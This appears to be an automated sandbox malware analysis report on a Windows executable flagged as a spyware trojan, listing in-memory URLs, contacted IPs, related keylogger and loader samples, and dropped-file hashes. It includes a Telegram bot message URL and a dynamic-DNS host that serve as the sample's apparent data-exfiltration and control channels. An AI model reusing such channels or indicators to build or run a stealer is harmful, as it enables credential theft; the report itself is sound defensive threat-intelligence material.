                                                                https://www.google.com/images/branding/product/ico/googleg_alldp.icoOW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/v20OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.office.com/4OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003301E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://drive.google.com/OW1i3n5K3s.exe, 00000008.00000002.2478960805.00000000025D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://anotherarmy.dns.army:8081OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://duckduckgo.com/chrome_newtabv20OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchOW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://chrome.google.com/webstore?hl=enlBOW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://reallyfreegeoip.org/xml/8.46.123.189$OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F3F000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032EF9000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://reallyfreegeoip.orgOW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://api.telegramOW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://reallyfreegeoip.orgOW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F3F000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032ECF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20aOW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003305B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://apis.google.comOW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://checkip.dyndns.comOW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://api.telegram.orgOW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://gemini.google.com/app?q=OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://drive.usercontent.google.com/5OW1i3n5K3s.exe, 00000008.00000003.1455368440.0000000002640000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.000000000263F000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1455467642.0000000002645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://reallyfreegeoip.org/xml/OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032ECF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        132.226.8.169
                                                                                                        		checkip.dyndns.comUnited States
                                                                                                        		16989UTMEMUSfalse
                                                                                                        149.154.167.220
                                                                                                        		api.telegram.orgUnited Kingdom
                                                                                                        		62041TELEGRAMRUfalse
                                                                                                        104.21.32.1
                                                                                                        		reallyfreegeoip.orgUnited States
                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                        172.217.16.129
                                                                                                        		drive.usercontent.google.comUnited States
                                                                                                        		15169GOOGLEUSfalse
                                                                                                        142.250.184.206
                                                                                                        		drive.google.comUnited States
                                                                                                        		15169GOOGLEUSfalse

                                                                                                        General Information

                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                        Analysis ID:1632404
                                                                                                        Start date and time:2025-03-07 23:27:57 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 7m 12s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:12
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:OW1i3n5K3s.exe
                                                                                                        renamed because original name is a hash value
                                                                                                        Original Sample Name:702ceddaa83348514f637a06c19a476999b3a391a7de4fc49efe9fa368fcaa62.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@3/15@5/5
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 98%
                                                                                                        • Number of executed functions: 209
                                                                                                        • Number of non-executed functions: 125
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 23.199.214.10
                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        17:29:28API Interceptor668087x Sleep call for process: OW1i3n5K3s.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        132.226.8.169cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        AEo2XQmxqZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        NDCNDvC27F.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        TfRJR0Y3uW.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        DNNueAb5UZ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        NmuA605dM4.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        4PYRGCo1Di.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        XiJhd7Lx30.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        149.154.167.220XFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  g44YQtTyjN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                    OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          xnlP06YunJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            104.21.32.1MmF9tcIj1J.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.newanthoperso.shop/lqfq/
                                                                                                                            Payment Invoice ref0306252.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.rbopisalive.cyou/a669/
                                                                                                                            DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.rbopisalive.cyou/2dxw/
                                                                                                                            RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.kdrqcyusevx.info/k7wl/
                                                                                                                            PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                                                                                                                            • touxzw.ir/scc1/five/fre.php
                                                                                                                            Stormwater Works Drawings Spec.jsGet hashmaliciousFormBookBrowse
                                                                                                                            • www.tumbetgirislinki.fit/k566/
                                                                                                                            SFT20020117.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.fz977.xyz/7p42/
                                                                                                                            PO from tpc Type 34.1 34,2 35 Spec.jsGet hashmaliciousFormBookBrowse
                                                                                                                            • www.tumbetgirislinki.fit/k566/
                                                                                                                            REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.clouser.store/3r9x/
                                                                                                                            PO 87877889X,pdf.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                                                            • www.tumbetgirislinki.fit/k566/

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            reallyfreegeoip.orgXFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.96.1
                                                                                                                            44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.112.1
                                                                                                                            UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.80.1
                                                                                                                            GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 104.21.96.1
                                                                                                                            sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 104.21.16.1
                                                                                                                            OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 104.21.80.1
                                                                                                                            lvrHOgPXr5.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 104.21.16.1
                                                                                                                            s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 104.21.64.1
                                                                                                                            GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 104.21.64.1
                                                                                                                            api.telegram.orgXFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            g44YQtTyjN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            xnlP06YunJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            checkip.dyndns.comXFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            lvrHOgPXr5.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 132.226.247.73

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            TELEGRAMRUXFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            g44YQtTyjN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            xnlP06YunJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            UTMEMUSXFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 132.226.8.169
                                                                                                                            axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 132.226.8.169
                                                                                                                            AEo2XQmxqZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 132.226.8.169
                                                                                                                            l9inNHJqHS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 132.226.8.169
                                                                                                                            CLOUDFLARENETUSDropper.exeGet hashmaliciousAsyncRAT, Trap Stealer, XWormBrowse
                                                                                                                            • 162.159.135.232
                                                                                                                            XFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.96.1
                                                                                                                            44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.112.1
                                                                                                                            6KzB3ReZ6z.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.80.1
                                                                                                                            3JZ4CUFqSs.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 104.21.96.1
                                                                                                                            HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 104.26.12.205
                                                                                                                            sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 104.21.16.1
                                                                                                                            OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.32.1

                                                                                                                            JA3 Fingerprints

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adXFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            lvrHOgPXr5.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            XFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            SecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            37f463bf4616ecd445d4a1937da06e19GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            g44YQtTyjN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            2Jq4fZJIJ8.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            GyGE2VaBFL.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            1258ad6Jpw.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            ZUY4Nq2SyY.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206

                                                                                                                            Dropped Files

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            C:\Users\user\AppData\Local\Temp\nsd854F.tmp\System.dllfacturas gastos.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              Factura proforma.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                Contract-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  Contract-pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    m4JIZpBl3o.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      UMOWA_20.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                        JOWcitzTY4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          dBMacros.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            dBMacros.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              PSAP_toolkit.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsd77B2.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\OW1i3n5K3s.exe
                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):13445828
                                                                                                                                                Entropy (8bit):0.5814945257046591
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:+Rr4EpfFtVO3Q+djgV6M4MugJGjH8jo80Wvepc:OsEpFtVO3QxGjcjWq
                                                                                                                                                MD5:2DC23F60FD8E5F721773594F15AF4A2A
                                                                                                                                                SHA1:C97C0646BB27235F768246231275AA94A02B70B9
                                                                                                                                                SHA-256:58D78BC7A7EE0C1DC9FB3AA9E12BC8274E072BC8E8D6FFB0B64F9B96347A403D
                                                                                                                                                SHA-512:A64302EE8A50113D156A93670DD8B306CE9622A3D36914346E870CE3DA07B5369446914DB499CA8FAF948F4991B0C903E7E1A0FE23AA9E120D4C3DA099203EC0
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:.;......,........................#.......:.......;............................................................3.............................................................................................................................................................................G...J...........m...j...............................................................................................................................................%...53..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsd854F.tmp\System.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\OW1i3n5K3s.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12288
                                                                                                                                                Entropy (8bit):5.805604762622714
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                                                                                                                MD5:4ADD245D4BA34B04F213409BFE504C07
                                                                                                                                                SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                                                                                                                SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
